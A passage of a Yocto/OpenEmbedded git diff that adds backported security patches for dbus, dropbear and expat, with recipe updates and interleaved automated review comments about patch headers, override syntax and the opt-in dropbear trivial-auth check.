- _dbus_string_set_length (buffer, start + bytes_read);
-
---
-2.25.1
-
diff --git a/meta/recipes-core/dbus/dbus/CVE-2023-34969.patch b/meta/recipes-core/dbus/dbus/CVE-2023-34969.patch
new file mode 100644
index 0000000000..8f29185cf6
--- /dev/null
+++ b/meta/recipes-core/dbus/dbus/CVE-2023-34969.patch
@@ -0,0 +1,96 @@
+From 37a4dc5835731a1f7a81f1b67c45b8dfb556dd1c Mon Sep 17 00:00:00 2001
+From: hongjinghao <q1204531485@163.com>
+Date: Mon, 5 Jun 2023 18:17:06 +0100
+Subject: [PATCH] bus: Assign a serial number for messages from the driver
+
+Normally, it's enough to rely on a message being given a serial number
+by the DBusConnection just before it is actually sent. However, in the
+rare case where the policy blocks the driver from sending a message
+(due to a deny rule or the outgoing message quota being full), we need
+to get a valid serial number sooner, so that we can copy it into the
+DBUS_HEADER_FIELD_REPLY_SERIAL field (which is mandatory) in the error
+message sent to monitors. Otherwise, the dbus-daemon will crash with
+an assertion failure if at least one Monitoring client is attached,
+because zero is not a valid serial number to copy.
+
+This fixes a denial-of-service vulnerability: if a privileged user is
+monitoring the well-known system bus using a Monitoring client like
+dbus-monitor or `busctl monitor`, then an unprivileged user can cause
+denial-of-service by triggering this crash. A mitigation for this
+vulnerability is to avoid attaching Monitoring clients to the system
+bus when they are not needed. If there are no Monitoring clients, then
+the vulnerable code is not reached.
+
+Co-authored-by: Simon McVittie <smcv@collabora.com>
+Resolves: dbus/dbus#457
+(cherry picked from commit b159849e031000d1dbc1ab876b5fc78a3ce9b534)
+---
+ bus/connection.c | 15 +++++++++++++++
+ dbus/dbus-connection-internal.h | 2 ++
+ dbus/dbus-connection.c | 11 ++++++++++-
+ 3 files changed, 27 insertions(+), 1 deletion(-)
+
+diff --git a/bus/connection.c b/bus/connection.c
+index b3583433..215f0230 100644
+--- a/bus/connection.c
++++ b/bus/connection.c
+@@ -2350,6 +2350,21 @@ bus_transaction_send_from_driver (BusTransaction *transaction,
+ if (!dbus_message_set_sender (message, DBUS_SERVICE_DBUS))
+ return FALSE;
+
++ /* Make sure the message has a non-zero serial number, otherwise
++ * bus_transaction_capture_error_reply() will not be able to mock up
++ * a corresponding reply for it. Normally this would be delayed until
++ * the first time we actually send the message out from a
++ * connection, when the transaction is committed, but that's too late
++ * in this case.
++ */
++ if (dbus_message_get_serial (message) == 0)
++ {
++ dbus_uint32_t next_serial;
++
++ next_serial = _dbus_connection_get_next_client_serial (connection);
++ dbus_message_set_serial (message, next_serial);
++ }
++
+ if (bus_connection_is_active (connection))
+ {
+ if (!dbus_message_set_destination (message,
+diff --git a/dbus/dbus-connection-internal.h b/dbus/dbus-connection-internal.h
+index 48357321..ba79b192 100644
+--- a/dbus/dbus-connection-internal.h
++++ b/dbus/dbus-connection-internal.h
+@@ -54,6 +54,8 @@ DBUS_PRIVATE_EXPORT
+ DBusConnection * _dbus_connection_ref_unlocked (DBusConnection *connection);
+ DBUS_PRIVATE_EXPORT
+ void _dbus_connection_unref_unlocked (DBusConnection *connection);
++DBUS_PRIVATE_EXPORT
++dbus_uint32_t _dbus_connection_get_next_client_serial (DBusConnection *connection);
+ void _dbus_connection_queue_received_message_link (DBusConnection *connection,
+ DBusList *link);
+ dbus_bool_t _dbus_connection_has_messages_to_send_unlocked (DBusConnection *connection);
+diff --git a/dbus/dbus-connection.c b/dbus/dbus-connection.c
+index c525b6dc..09cef278 100644
+--- a/dbus/dbus-connection.c
++++ b/dbus/dbus-connection.c
+@@ -1456,7 +1456,16 @@ _dbus_connection_unref_unlocked (DBusConnection *connection)
+ _dbus_connection_last_unref (connection);
+ }
+
+-static dbus_uint32_t
++/**
++ * Allocate and return the next non-zero serial number for outgoing messages.
++ *
++ * This method is only valid to call from single-threaded code, such as
++ * the dbus-daemon, or with the connection lock held.
++ *
++ * @param connection the connection
++ * @returns A suitable serial number for the next message to be sent on the connection.
++ */
++dbus_uint32_t
+ _dbus_connection_get_next_client_serial (DBusConnection *connection)
+ {
+ dbus_uint32_t serial;
+--
+2.25.1
+
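Review bot: The patch header has no `CVE:` line, no `Upstream-Status:` line and no Signed-off-by from whoever did the backport, unlike CVE-2022-48174.patch earlier in this commit. Adding `CVE: CVE-2023-34969` and `Upstream-Status: Backport [<upstream commit URL>]` above the `---` separator records the provenance in the file itself rather than only in its name. The existing "cherry picked from commit" line gives the reference to point at.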
diff --git a/meta/recipes-core/dbus/dbus_1.12.16.bb b/meta/recipes-core/dbus/dbus_1.12.24.bb
index 10d1b34448..cf6f7dc0ef 100644
--- a/meta/recipes-core/dbus/dbus_1.12.16.bb
+++ b/meta/recipes-core/dbus/dbus_1.12.24.bb
@@ -2,9 +2,9 @@ SUMMARY = "D-Bus message bus"
DESCRIPTION = "D-Bus is a message bus system, a simple way for applications to talk to one another. In addition to interprocess communication, D-Bus helps coordinate process lifecycle; it makes it simple and reliable to code a \"single instance\" application or daemon, and to launch applications and daemons on demand when their services are needed."
HOMEPAGE = "https://dbus.freedesktop.org"
SECTION = "base"
-LICENSE = "AFL-2.1 | GPLv2+"
-LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \
- file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c"
+
+require dbus.inc
+
DEPENDS = "expat virtual/libintl autoconf-archive"
RDEPENDS_dbus_class-native = ""
RDEPENDS_dbus_class-nativesdk = ""
@@ -12,17 +12,7 @@ PACKAGES += "${@bb.utils.contains('DISTRO_FEATURES', 'ptest', '${PN}-ptest', '',
ALLOW_EMPTY_dbus-ptest = "1"
RDEPENDS_dbus-ptest_class-target = "dbus-test-ptest"
-SRC_URI = "https://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \
- file://tmpdir.patch \
- file://dbus-1.init \
- file://clear-guid_from_server-if-send_negotiate_unix_f.patch \
- file://CVE-2020-12049.patch \
-"
-
-SRC_URI[md5sum] = "2dbeae80dfc9e3632320c6a53d5e8890"
-SRC_URI[sha256sum] = "54a22d2fa42f2eb2a871f32811c6005b531b9613b1b93a0d269b05e7549fec80"
-
-inherit useradd autotools pkgconfig gettext update-rc.d upstream-version-is-even
+inherit useradd update-rc.d
INITSCRIPT_NAME = "dbus-1"
INITSCRIPT_PARAMS = "start 02 5 3 2 . stop 20 0 1 6 ."
@@ -93,27 +83,7 @@ pkg_postinst_dbus() {
}
-EXTRA_OECONF = "--disable-tests \
- --disable-xml-docs \
- --disable-doxygen-docs \
- --disable-libaudit \
- --enable-largefile \
- --with-system-socket=/run/dbus/system_bus_socket \
- "
-
-EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl"
-EXTRA_OECONF_append_class-native = " --disable-selinux"
-
-PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)} \
- user-session \
- "
-
-PACKAGECONFIG_class-native = ""
-PACKAGECONFIG_class-nativesdk = ""
-
-PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd"
-PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm"
-PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session"
+EXTRA_OECONF += "--disable-tests"
do_install() {
autotools_do_install
diff --git a/meta/recipes-core/dropbear/dropbear.inc b/meta/recipes-core/dropbear/dropbear.inc
index 7269888a4e..0f5e9ba4ac 100644
--- a/meta/recipes-core/dropbear/dropbear.inc
+++ b/meta/recipes-core/dropbear/dropbear.inc
@@ -1,5 +1,6 @@
SUMMARY = "A lightweight SSH and SCP implementation"
HOMEPAGE = "http://matt.ucc.asn.au/dropbear/dropbear.html"
+DESCRIPTION = "Dropbear is a relatively small SSH server and client. It runs on a variety of POSIX-based platforms. Dropbear is open source software, distributed under a MIT-style license. Dropbear is particularly useful for "embedded"-type Linux (or other Unix) systems, such as wireless routers."
SECTION = "console/network"
# some files are from other projects and have others license terms:
@@ -11,6 +12,11 @@ DEPENDS = "zlib virtual/crypt"
RPROVIDES_${PN} = "ssh sshd"
RCONFLICTS_${PN} = "openssh-sshd openssh"
+# break dependency on base package for -dev package
+# otherwise SDK fails to build as the main openssh and dropbear packages
+# conflict with each other
+RDEPENDS:${PN}-dev = ""
+
DEPENDS += "${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'libpam', '', d)}"
SRC_URI = "http://matt.ucc.asn.au/dropbear/releases/dropbear-${PV}.tar.bz2 \
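Review bot: `RDEPENDS:${PN}-dev = ""` uses the colon override syntax, while every other override on this page uses the underscore form (`RPROVIDES_${PN}` and `RCONFLICTS_${PN}` just above it, `RDEPENDS_${PN}-dev = ""` in dbus-test). If this branch's BitBake does not treat `:` as the override separator, the assignment does not apply to the -dev package, which then keeps its dependency on the main package and leaves the SDK conflict described in the comment in place. Writing it as `RDEPENDS_${PN}-dev = ""` matches the rest of the file.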
@@ -21,7 +27,10 @@ SRC_URI = "http://matt.ucc.asn.au/dropbear/releases/dropbear-${PV}.tar.bz2 \
file://dropbear.socket \
file://dropbear.default \
${@bb.utils.contains('DISTRO_FEATURES', 'pam', '${PAM_SRC_URI}', '', d)} \
- ${@bb.utils.contains('PACKAGECONFIG', 'disable-weak-ciphers', 'file://dropbear-disable-weak-ciphers.patch', '', d)} "
+ ${@bb.utils.contains('PACKAGECONFIG', 'disable-weak-ciphers', 'file://dropbear-disable-weak-ciphers.patch', '', d)} \
+ file://CVE-2020-36254.patch \
+ file://CVE-2021-36369.patch \
+ "
PAM_SRC_URI = "file://0005-dropbear-enable-pam.patch \
file://0006-dropbear-configuration-file.patch \
diff --git a/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch b/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch
new file mode 100644
index 0000000000..64d0d96486
--- /dev/null
+++ b/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch
@@ -0,0 +1,29 @@
+From c96c48d62aefc372f2105293ddf8cff2d116dc3a Mon Sep 17 00:00:00 2001
+From: Haelwenn Monnier <contact+github.com@hacktivis.me>
+Date: Mon, 25 May 2020 14:54:29 +0200
+Subject: [PATCH] scp.c: Port OpenSSH CVE-2018-20685 fix (#80)
+
+Reference:
+https://github.com/mkj/dropbear/commit/8f8a3dff705fad774a10864a2e3dbcfa9779ceff
+
+CVE: CVE-2020-36254
+Upstream-Status: Backport
+
+---
+ scp.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/scp.c b/scp.c
+index 742ae00..7b8e7d2 100644
+--- a/scp.c
++++ b/scp.c
+@@ -935,7 +935,8 @@ sink(int argc, char **argv)
+ size = size * 10 + (*cp++ - '0');
+ if (*cp++ != ' ')
+ SCREWUP("size not delimited");
+- if ((strchr(cp, '/') != NULL) || (strcmp(cp, "..") == 0)) {
++ if (*cp == '\0' || strchr(cp, '/') != NULL ||
++ strcmp(cp, ".") == 0 || strcmp(cp, "..") == 0) {
+ run_err("error: unexpected filename: %s", cp);
+ exit(1);
+ }
diff --git a/meta/recipes-core/dropbear/dropbear/CVE-2021-36369.patch b/meta/recipes-core/dropbear/dropbear/CVE-2021-36369.patch
new file mode 100644
index 0000000000..5cabe8339d
--- /dev/null
+++ b/meta/recipes-core/dropbear/dropbear/CVE-2021-36369.patch
@@ -0,0 +1,145 @@
+From e10dec82930863e487b22978d3df107274f366b2 Mon Sep 17 00:00:00 2001
+From: Manfred Kaiser <37737811+manfred-kaiser@users.noreply.github.com>
+Date: Thu, 19 Aug 2021 17:37:14 +0200
+Subject: [PATCH] added option to disable trivial auth methods (#128)
+
+* added option to disable trivial auth methods
+
+* rename argument to match with other ssh clients
+
+* fixed trivial auth detection for pubkeys
+
+[https://github.com/mkj/dropbear/pull/128]
+Upstream-Status: Backport
+CVE: CVE-2021-36369
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ cli-auth.c | 3 +++
+ cli-authinteract.c | 1 +
+ cli-authpasswd.c | 2 +-
+ cli-authpubkey.c | 1 +
+ cli-runopts.c | 7 +++++++
+ cli-session.c | 1 +
+ runopts.h | 1 +
+ session.h | 1 +
+ 8 files changed, 16 insertions(+), 1 deletion(-)
+
+diff --git a/cli-auth.c b/cli-auth.c
+index 2e509e5..6f04495 100644
+--- a/cli-auth.c
++++ b/cli-auth.c
+@@ -267,6 +267,9 @@ void recv_msg_userauth_success() {
+ if DROPBEAR_CLI_IMMEDIATE_AUTH is set */
+
+ TRACE(("received msg_userauth_success"))
++ if (cli_opts.disable_trivial_auth && cli_ses.is_trivial_auth) {
++ dropbear_exit("trivial authentication not allowed");
++ }
+ /* Note: in delayed-zlib mode, setting authdone here
+ * will enable compression in the transport layer */
+ ses.authstate.authdone = 1;
+diff --git a/cli-authinteract.c b/cli-authinteract.c
+index e1cc9a1..f7128ee 100644
+--- a/cli-authinteract.c
++++ b/cli-authinteract.c
+@@ -114,6 +114,7 @@ void recv_msg_userauth_info_request() {
+ m_free(instruction);
+
+ for (i = 0; i < num_prompts; i++) {
++ cli_ses.is_trivial_auth = 0;
+ unsigned int response_len = 0;
+ prompt = buf_getstring(ses.payload, NULL);
+ cleantext(prompt);
+diff --git a/cli-authpasswd.c b/cli-authpasswd.c
+index 00fdd8b..a24d43e 100644
+--- a/cli-authpasswd.c
++++ b/cli-authpasswd.c
+@@ -155,7 +155,7 @@ void cli_auth_password() {
+
+ encrypt_packet();
+ m_burn(password, strlen(password));
+-
++ cli_ses.is_trivial_auth = 0;
+ TRACE(("leave cli_auth_password"))
+ }
+ #endif /* DROPBEAR_CLI_PASSWORD_AUTH */
+diff --git a/cli-authpubkey.c b/cli-authpubkey.c
+index 7cee164..7da1a04 100644
+--- a/cli-authpubkey.c
++++ b/cli-authpubkey.c
+@@ -174,6 +174,7 @@ static void send_msg_userauth_pubkey(sign_key *key, int type, int realsign) {
+ buf_putbytes(sigbuf, ses.writepayload->data, ses.writepayload->len);
+ cli_buf_put_sign(ses.writepayload, key, type, sigbuf);
+ buf_free(sigbuf); /* Nothing confidential in the buffer */
++ cli_ses.is_trivial_auth = 0;
+ }
+
+ encrypt_packet();
+diff --git a/cli-runopts.c b/cli-runopts.c
+index 7d1fffe..6bf8b8e 100644
+--- a/cli-runopts.c
++++ b/cli-runopts.c
+@@ -152,6 +152,7 @@ void cli_getopts(int argc, char ** argv) {
+ #if DROPBEAR_CLI_ANYTCPFWD
+ cli_opts.exit_on_fwd_failure = 0;
+ #endif
++ cli_opts.disable_trivial_auth = 0;
+ #if DROPBEAR_CLI_LOCALTCPFWD
+ cli_opts.localfwds = list_new();
+ opts.listen_fwd_all = 0;
+@@ -888,6 +889,7 @@ static void add_extendedopt(const char* origstr) {
+ #if DROPBEAR_CLI_ANYTCPFWD
+ "\tExitOnForwardFailure\n"
+ #endif
++ "\tDisableTrivialAuth\n"
+ #ifndef DISABLE_SYSLOG
+ "\tUseSyslog\n"
+ #endif
+@@ -915,5 +917,10 @@ static void add_extendedopt(const char* origstr) {
+ return;
+ }
+
++ if (match_extendedopt(&optstr, "DisableTrivialAuth") == DROPBEAR_SUCCESS) {
++ cli_opts.disable_trivial_auth = parse_flag_value(optstr);
++ return;
++ }
++
+ dropbear_log(LOG_WARNING, "Ignoring unknown configuration option '%s'", origstr);
+ }
+diff --git a/cli-session.c b/cli-session.c
+index 56dd4af..73ef0db 100644
+--- a/cli-session.c
++++ b/cli-session.c
+@@ -164,6 +164,7 @@ static void cli_session_init(pid_t proxy_cmd_pid) {
+ /* Auth */
+ cli_ses.lastprivkey = NULL;
+ cli_ses.lastauthtype = 0;
++ cli_ses.is_trivial_auth = 1;
+
+ /* For printing "remote host closed" for the user */
+ ses.remoteclosed = cli_remoteclosed;
+diff --git a/runopts.h b/runopts.h
+index 31eae1f..8519626 100644
+--- a/runopts.h
++++ b/runopts.h
+@@ -154,6 +154,7 @@ typedef struct cli_runopts {
+ #if DROPBEAR_CLI_ANYTCPFWD
+ int exit_on_fwd_failure;
+ #endif
++ int disable_trivial_auth;
+ #if DROPBEAR_CLI_REMOTETCPFWD
+ m_list * remotefwds;
+ #endif
+diff --git a/session.h b/session.h
+index 0f77055..8676054 100644
+--- a/session.h
++++ b/session.h
+@@ -287,6 +287,7 @@ struct clientsession {
+
+ int lastauthtype; /* either AUTH_TYPE_PUBKEY or AUTH_TYPE_PASSWORD,
+ for the last type of auth we tried */
++ int is_trivial_auth;
+ int ignore_next_auth_response;
+ #if DROPBEAR_CLI_INTERACT_AUTH
+ int auth_interact_failed; /* flag whether interactive auth can still
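Review bot: The check added in recv_msg_userauth_success() only fires when `cli_opts.disable_trivial_auth` is set, and cli_getopts() initialises that field to 0. With this backport applied, the client therefore still accepts an authentication success that followed no password, signature or interactive prompt unless the `DisableTrivialAuth` extended option is enabled. The patch header should say so, for example `Note: the check is opt-in via DisableTrivialAuth; default client behaviour is unchanged`, so that marking the CVE as patched is not read as a change of default. The new field in session.h has no comment; `int is_trivial_auth; /* 1 until a password, a pubkey signature or an interactive prompt has been handled */` would match the commented fields around it. In cli-authinteract.c the assignment is placed ahead of the declaration of `response_len` inside the loop body, and moving it below that declaration keeps declarations first in the block.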
diff --git a/meta/recipes-core/ell/ell_0.33.bb b/meta/recipes-core/ell/ell_0.33.bb
index 2fa05104fb..bef1e9a0b5 100644
--- a/meta/recipes-core/ell/ell_0.33.bb
+++ b/meta/recipes-core/ell/ell_0.33.bb
@@ -1,4 +1,5 @@
SUMMARY = "Embedded Linux Library"
+HOMEPAGE = "https://01.org/ell"
DESCRIPTION = "The Embedded Linux Library (ELL) provides core, \
low-level functionality for system daemons. It typically has no \
dependencies other than the Linux kernel, C standard library, and \
diff --git a/meta/recipes-core/expat/expat/CVE-2013-0340.patch b/meta/recipes-core/expat/expat/CVE-2013-0340.patch
new file mode 100644
index 0000000000..1ab4d06508
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2013-0340.patch
@@ -0,0 +1,1758 @@
+From a644ccf25392523b1329872310e24d0fc5f40629 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Mon, 19 Apr 2021 21:42:51 +0200
+Subject: [PATCH] expat: Backport fix for CVE-2013-0340
+
+Issue: https://github.com/libexpat/libexpat/issues/34
+
+This patch cherry-picks the following commits from upstream release
+2.4.0 onto 2.2.9:
+
+- b1d039607d3d8a042bf0466bfcc1c0f104e353c8
+- 60959f2b491876199879d97c8ed956eabb0c2e73
+
+Upstream-Status: Backport
+CVE: CVE-2013-0340
+Signed-off-by: Jasper Orschulko <jasper@fancydomain.eu>
+---
+ lib/expat.h | 21 +-
+ lib/internal.h | 30 +
+ lib/libexpat.def | 3 +
+ lib/libexpatw.def | 3 +
+ lib/xmlparse.c | 1147 +++++++++++++++++++++++++++++++++++++--
+ 5 files changed, 1143 insertions(+), 61 deletions(-)
+
+diff --git a/lib/expat.h b/lib/expat.h
+index 48a6e2a3..0fb70d9d 100644
+--- a/lib/expat.h
++++ b/lib/expat.h
+@@ -115,7 +115,9 @@ enum XML_Error {
+ XML_ERROR_RESERVED_PREFIX_XMLNS,
+ XML_ERROR_RESERVED_NAMESPACE_URI,
+ /* Added in 2.2.1. */
+- XML_ERROR_INVALID_ARGUMENT
++ XML_ERROR_INVALID_ARGUMENT,
++ /* Added in 2.4.0. */
++ XML_ERROR_AMPLIFICATION_LIMIT_BREACH
+ };
+
+ enum XML_Content_Type {
+@@ -997,7 +999,10 @@ enum XML_FeatureEnum {
+ XML_FEATURE_SIZEOF_XML_LCHAR,
+ XML_FEATURE_NS,
+ XML_FEATURE_LARGE_SIZE,
+- XML_FEATURE_ATTR_INFO
++ XML_FEATURE_ATTR_INFO,
++ /* Added in Expat 2.4.0. */
++ XML_FEATURE_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT,
++ XML_FEATURE_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT
+ /* Additional features must be added to the end of this enum. */
+ };
+
+@@ -1010,6 +1015,18 @@ typedef struct {
+ XMLPARSEAPI(const XML_Feature *)
+ XML_GetFeatureList(void);
+
++#ifdef XML_DTD
++/* Added in Expat 2.4.0. */
++XMLPARSEAPI(XML_Bool)
++XML_SetBillionLaughsAttackProtectionMaximumAmplification(
++ XML_Parser parser, float maximumAmplificationFactor);
++
++/* Added in Expat 2.4.0. */
++XMLPARSEAPI(XML_Bool)
++XML_SetBillionLaughsAttackProtectionActivationThreshold(
++ XML_Parser parser, unsigned long long activationThresholdBytes);
++#endif
++
+ /* Expat follows the semantic versioning convention.
+ See http://semver.org.
+ */
+diff --git a/lib/internal.h b/lib/internal.h
+index 60913dab..d8b31fa2 100644
+--- a/lib/internal.h
++++ b/lib/internal.h
+@@ -101,10 +101,40 @@
+ # endif
+ #endif
+
++#include <limits.h> // ULONG_MAX
++
++#if defined(_WIN32) && ! defined(__USE_MINGW_ANSI_STDIO)
++# define EXPAT_FMT_ULL(midpart) "%" midpart "I64u"
++# if defined(_WIN64) // Note: modifier "td" does not work for MinGW
++# define EXPAT_FMT_PTRDIFF_T(midpart) "%" midpart "I64d"
++# else
++# define EXPAT_FMT_PTRDIFF_T(midpart) "%" midpart "d"
++# endif
++#else
++# define EXPAT_FMT_ULL(midpart) "%" midpart "llu"
++# if ! defined(ULONG_MAX)
++# error Compiler did not define ULONG_MAX for us
++# elif ULONG_MAX == 18446744073709551615u // 2^64-1
++# define EXPAT_FMT_PTRDIFF_T(midpart) "%" midpart "ld"
++# else
++# define EXPAT_FMT_PTRDIFF_T(midpart) "%" midpart "d"
++# endif
++#endif
++
+ #ifndef UNUSED_P
+ # define UNUSED_P(p) (void)p
+ #endif
+
++/* NOTE BEGIN If you ever patch these defaults to greater values
++ for non-attack XML payload in your environment,
++ please file a bug report with libexpat. Thank you!
++*/
++#define EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT \
++ 100.0f
++#define EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT \
++ 8388608 // 8 MiB, 2^23
++/* NOTE END */
++
+ #ifdef __cplusplus
+ extern "C" {
+ #endif
+diff --git a/lib/libexpat.def b/lib/libexpat.def
+index 16faf595..5aefa6df 100644
+--- a/lib/libexpat.def
++++ b/lib/libexpat.def
+@@ -76,3 +76,6 @@ EXPORTS
+ XML_SetHashSalt @67
+ ; added with version 2.2.5
+ _INTERNAL_trim_to_complete_utf8_characters @68
++; added with version 2.4.0
++ XML_SetBillionLaughsAttackProtectionActivationThreshold @69
++ XML_SetBillionLaughsAttackProtectionMaximumAmplification @70
+diff --git a/lib/libexpatw.def b/lib/libexpatw.def
+index 16faf595..5aefa6df 100644
+--- a/lib/libexpatw.def
++++ b/lib/libexpatw.def
+@@ -76,3 +76,6 @@ EXPORTS
+ XML_SetHashSalt @67
+ ; added with version 2.2.5
+ _INTERNAL_trim_to_complete_utf8_characters @68
++; added with version 2.4.0
++ XML_SetBillionLaughsAttackProtectionActivationThreshold @69
++ XML_SetBillionLaughsAttackProtectionMaximumAmplification @70
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 3aaf35b9..6790bc28 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -47,6 +47,8 @@
+ #include <limits.h> /* UINT_MAX */
+ #include <stdio.h> /* fprintf */
+ #include <stdlib.h> /* getenv, rand_s */
++#include <stdint.h> /* uintptr_t */
++#include <math.h> /* isnan */
+
+ #ifdef _WIN32
+ # define getpid GetCurrentProcessId
+@@ -373,6 +375,31 @@ typedef struct open_internal_entity {
+ XML_Bool betweenDecl; /* WFC: PE Between Declarations */
+ } OPEN_INTERNAL_ENTITY;
+
++enum XML_Account {
++ XML_ACCOUNT_DIRECT, /* bytes directly passed to the Expat parser */
++ XML_ACCOUNT_ENTITY_EXPANSION, /* intermediate bytes produced during entity
++ expansion */
++ XML_ACCOUNT_NONE /* i.e. do not account, was accounted already */
++};
++
++#ifdef XML_DTD
++typedef unsigned long long XmlBigCount;
++typedef struct accounting {
++ XmlBigCount countBytesDirect;
++ XmlBigCount countBytesIndirect;
++ int debugLevel;
++ float maximumAmplificationFactor; // >=1.0
++ unsigned long long activationThresholdBytes;
++} ACCOUNTING;
++
++typedef struct entity_stats {
++ unsigned int countEverOpened;
++ unsigned int currentDepth;
++ unsigned int maximumDepthSeen;
++ int debugLevel;
++} ENTITY_STATS;
++#endif /* XML_DTD */
++
+ typedef enum XML_Error PTRCALL Processor(XML_Parser parser, const char *start,
+ const char *end, const char **endPtr);
+
+@@ -403,16 +430,18 @@ static enum XML_Error initializeEncoding(XML_Parser parser);
+ static enum XML_Error doProlog(XML_Parser parser, const ENCODING *enc,
+ const char *s, const char *end, int tok,
+ const char *next, const char **nextPtr,
+- XML_Bool haveMore, XML_Bool allowClosingDoctype);
++ XML_Bool haveMore, XML_Bool allowClosingDoctype,
++ enum XML_Account account);
+ static enum XML_Error processInternalEntity(XML_Parser parser, ENTITY *entity,
+ XML_Bool betweenDecl);
+ static enum XML_Error doContent(XML_Parser parser, int startTagLevel,
+ const ENCODING *enc, const char *start,
+ const char *end, const char **endPtr,
+- XML_Bool haveMore);
++ XML_Bool haveMore, enum XML_Account account);
+ static enum XML_Error doCdataSection(XML_Parser parser, const ENCODING *,
+ const char **startPtr, const char *end,
+- const char **nextPtr, XML_Bool haveMore);
++ const char **nextPtr, XML_Bool haveMore,
++ enum XML_Account account);
+ #ifdef XML_DTD
+ static enum XML_Error doIgnoreSection(XML_Parser parser, const ENCODING *,
+ const char **startPtr, const char *end,
+@@ -422,7 +451,8 @@ static enum XML_Error doIgnoreSection(XML_Parser parser, const ENCODING *,
+ static void freeBindings(XML_Parser parser, BINDING *bindings);
+ static enum XML_Error storeAtts(XML_Parser parser, const ENCODING *,
+ const char *s, TAG_NAME *tagNamePtr,
+- BINDING **bindingsPtr);
++ BINDING **bindingsPtr,
++ enum XML_Account account);
+ static enum XML_Error addBinding(XML_Parser parser, PREFIX *prefix,
+ const ATTRIBUTE_ID *attId, const XML_Char *uri,
+ BINDING **bindingsPtr);
+@@ -431,15 +461,18 @@ static int defineAttribute(ELEMENT_TYPE *type, ATTRIBUTE_ID *, XML_Bool isCdata,
+ XML_Parser parser);
+ static enum XML_Error storeAttributeValue(XML_Parser parser, const ENCODING *,
+ XML_Bool isCdata, const char *,
+- const char *, STRING_POOL *);
++ const char *, STRING_POOL *,
++ enum XML_Account account);
+ static enum XML_Error appendAttributeValue(XML_Parser parser, const ENCODING *,
+ XML_Bool isCdata, const char *,
+- const char *, STRING_POOL *);
++ const char *, STRING_POOL *,
++ enum XML_Account account);
+ static ATTRIBUTE_ID *getAttributeId(XML_Parser parser, const ENCODING *enc,
+ const char *start, const char *end);
+ static int setElementTypePrefix(XML_Parser parser, ELEMENT_TYPE *);
+ static enum XML_Error storeEntityValue(XML_Parser parser, const ENCODING *enc,
+- const char *start, const char *end);
++ const char *start, const char *end,
++ enum XML_Account account);
+ static int reportProcessingInstruction(XML_Parser parser, const ENCODING *enc,
+ const char *start, const char *end);
+ static int reportComment(XML_Parser parser, const ENCODING *enc,
+@@ -503,6 +536,35 @@ static XML_Parser parserCreate(const XML_Char *encodingName,
+
+ static void parserInit(XML_Parser parser, const XML_Char *encodingName);
+
++#ifdef XML_DTD
++static float accountingGetCurrentAmplification(XML_Parser rootParser);
++static void accountingReportStats(XML_Parser originParser, const char *epilog);
++static void accountingOnAbort(XML_Parser originParser);
++static void accountingReportDiff(XML_Parser rootParser,
++ unsigned int levelsAwayFromRootParser,
++ const char *before, const char *after,
++ ptrdiff_t bytesMore, int source_line,
++ enum XML_Account account);
++static XML_Bool accountingDiffTolerated(XML_Parser originParser, int tok,
++ const char *before, const char *after,
++ int source_line,
++ enum XML_Account account);
++
++static void entityTrackingReportStats(XML_Parser parser, ENTITY *entity,
++ const char *action, int sourceLine);
++static void entityTrackingOnOpen(XML_Parser parser, ENTITY *entity,
++ int sourceLine);
++static void entityTrackingOnClose(XML_Parser parser, ENTITY *entity,
++ int sourceLine);
++
++static XML_Parser getRootParserOf(XML_Parser parser,
++ unsigned int *outLevelDiff);
++static const char *unsignedCharToPrintable(unsigned char c);
++#endif /* XML_DTD */
++
++static unsigned long getDebugLevel(const char *variableName,
++ unsigned long defaultDebugLevel);
++
+ #define poolStart(pool) ((pool)->start)
+ #define poolEnd(pool) ((pool)->ptr)
+ #define poolLength(pool) ((pool)->ptr - (pool)->start)
+@@ -616,6 +678,10 @@ struct XML_ParserStruct {
+ enum XML_ParamEntityParsing m_paramEntityParsing;
+ #endif
+ unsigned long m_hash_secret_salt;
++#ifdef XML_DTD
++ ACCOUNTING m_accounting;
++ ENTITY_STATS m_entity_stats;
++#endif
+ };
+
+ #define MALLOC(parser, s) (parser->m_mem.malloc_fcn((s)))
+@@ -1055,6 +1121,18 @@ parserInit(XML_Parser parser, const XML_Char *encodingName) {
+ parser->m_paramEntityParsing = XML_PARAM_ENTITY_PARSING_NEVER;
+ #endif
+ parser->m_hash_secret_salt = 0;
++
++#ifdef XML_DTD
++ memset(&parser->m_accounting, 0, sizeof(ACCOUNTING));
++ parser->m_accounting.debugLevel = getDebugLevel("EXPAT_ACCOUNTING_DEBUG", 0u);
++ parser->m_accounting.maximumAmplificationFactor
++ = EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT;
++ parser->m_accounting.activationThresholdBytes
